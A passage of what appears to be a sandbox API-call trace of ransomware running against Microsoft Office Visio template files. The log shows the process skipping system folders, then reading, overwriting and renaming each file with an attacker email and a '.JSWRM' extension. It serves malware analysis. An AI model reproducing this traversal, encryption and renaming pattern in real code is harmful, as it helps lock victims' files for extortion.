(lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2=".") returned 1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="..") returned 1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="...") returned 1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="windows") returned -1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="recovery") returned -1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="perflogs") returned -1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="documents and settings") returned -1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="system volume information") returned -1 [0146.494] lstrcmpiW (lpString1="CFF_SHAREDPROCESS_U.VSTX", lpString2="msocache") returned -1 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_U.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_U.VSTX", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_SHAREDPROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 24 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_U.VSTX", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_SHAREDPROCESS_U.VSTX", cchWideChar=24, lpMultiByteStr=0x241178, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_SHAREDPROCESS_U.VSTX", lpUsedDefaultChar=0x0) returned 24 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.494] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.494] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.495] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=75620) returned 1 [0146.495] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.495] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x12760, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x12760, lpOverlapped=0x0) returned 1 [0146.502] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.502] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x12760, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x12760, lpOverlapped=0x0) returned 1 [0146.502] CloseHandle (hObject=0x314) returned 1 [0146.503] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_SHAREDPROCESS_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_sharedprocess_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.504] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x168ac, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_VERTICAL_M.VSTX", cAlternateFileName="CFF_VE~1.VST")) returned 1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2=".") returned 1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="..") returned 1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="...") returned 1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="windows") returned -1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="recovery") returned -1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="perflogs") returned -1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="documents and settings") returned -1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="system volume information") returned -1 [0146.504] lstrcmpiW (lpString1="CFF_VERTICAL_M.VSTX", lpString2="msocache") returned -1 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_M.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_M.VSTX", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_VERTICAL_M.VSTX", lpUsedDefaultChar=0x0) returned 19 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_M.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_M.VSTX", cchWideChar=19, lpMultiByteStr=0x241268, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_VERTICAL_M.VSTX", lpUsedDefaultChar=0x0) returned 19 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.504] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.504] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.505] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=92332) returned 1 [0146.505] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.505] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x168a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x168a0, lpOverlapped=0x0) returned 1 [0146.513] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.513] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x168a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x168a0, lpOverlapped=0x0) returned 1 [0146.514] CloseHandle (hObject=0x314) returned 1 [0146.514] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.515] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x16042, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CFF_VERTICAL_U.VSTX", cAlternateFileName="CFF_VE~2.VST")) returned 1 [0146.515] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2=".") returned 1 [0146.515] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="..") returned 1 [0146.515] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="...") returned 1 [0146.515] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="windows") returned -1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="recovery") returned -1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="perflogs") returned -1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="documents and settings") returned -1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="system volume information") returned -1 [0146.516] lstrcmpiW (lpString1="CFF_VERTICAL_U.VSTX", lpString2="msocache") returned -1 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_U.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_U.VSTX", cchWideChar=19, lpMultiByteStr=0x241178, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_VERTICAL_U.VSTX", lpUsedDefaultChar=0x0) returned 19 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_U.VSTX", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CFF_VERTICAL_U.VSTX", cchWideChar=19, lpMultiByteStr=0x240f20, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CFF_VERTICAL_U.VSTX", lpUsedDefaultChar=0x0) returned 19 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_u.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.517] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=90178) returned 1 [0146.517] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.517] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x16040, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x16040, lpOverlapped=0x0) returned 1 [0146.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.558] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x16040, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x16040, lpOverlapped=0x0) returned 1 [0146.559] CloseHandle (hObject=0x314) returned 1 [0146.559] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_U.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_u.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CFF_VERTICAL_U.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\cff_vertical_u.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.562] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1f3541d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x1f3541d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x1f3541d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2274f, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CHART_M.VSSX", cAlternateFileName="CHART_~1.VSS")) returned 1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2=".") returned 1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="..") returned 1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="...") returned 1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="windows") returned -1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="recovery") returned -1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="perflogs") returned -1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="documents and settings") returned -1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="system volume information") returned -1 [0146.562] lstrcmpiW (lpString1="CHART_M.VSSX", lpString2="msocache") returned -1 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSSX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSSX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_M.VSSX", lpUsedDefaultChar=0x0) returned 12 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vssx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=141135) returned 1 [0146.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.564] ReadFile (in: hFile=0x314, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x22740, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e534*=0x22740, lpOverlapped=0x0) returned 1 [0146.575] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.575] WriteFile (in: hFile=0x314, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x22740, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e530*=0x22740, lpOverlapped=0x0) returned 1 [0146.576] CloseHandle (hObject=0x314) returned 1 [0146.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSSX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vssx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSSX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vssx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.578] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x49d316e, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x49d316e, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x49d316e, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x96af, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CHART_M.VSTX", cAlternateFileName="CHART_~1.VST")) returned 1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2=".") returned 1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="..") returned 1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="...") returned 1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="windows") returned -1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="recovery") returned -1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="perflogs") returned -1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="documents and settings") returned -1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="$RECYCLE.BIN") returned 1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="system volume information") returned -1 [0146.578] lstrcmpiW (lpString1="CHART_M.VSTX", lpString2="msocache") returned -1 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSTX", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CHART_M.VSTX", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CHART_M.VSTX", lpUsedDefaultChar=0x0) returned 12 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0146.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0146.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vstx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0146.579] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=38575) returned 1 [0146.579] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.580] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0x96a0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0x96a0, lpOverlapped=0x0) returned 1 [0146.586] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.586] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x96a0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0x96a0, lpOverlapped=0x0) returned 1 [0146.586] CloseHandle (hObject=0x314) returned 1 [0146.586] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSTX" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vstx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio Content\\1033\\CHART_M.VSTX.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\visio content\\1033\\chart_m.vstx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0146.587] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x297d49a, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x297d49a, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x29a3769, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x2056d, dwReserved0=0x60002, dwReserved1=0x210d24, cFileName="CHART_U.VSSX", cAlternateFileName="CHART_~2.VSS")) returned 1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2=".") returned 1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="..") returned 1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="...") returned 1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="windows") returned -1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="recovery") returned -1 [0146.587] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="perflogs") returned -1 [0146.588] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="documents and settings") returned -1 [0146.588] lstrcmpiW (lpString1="CHART_U.VSSX", lpString2="$RECYCLE.BIN") returned 1 [0146.588] lstrcmpiW 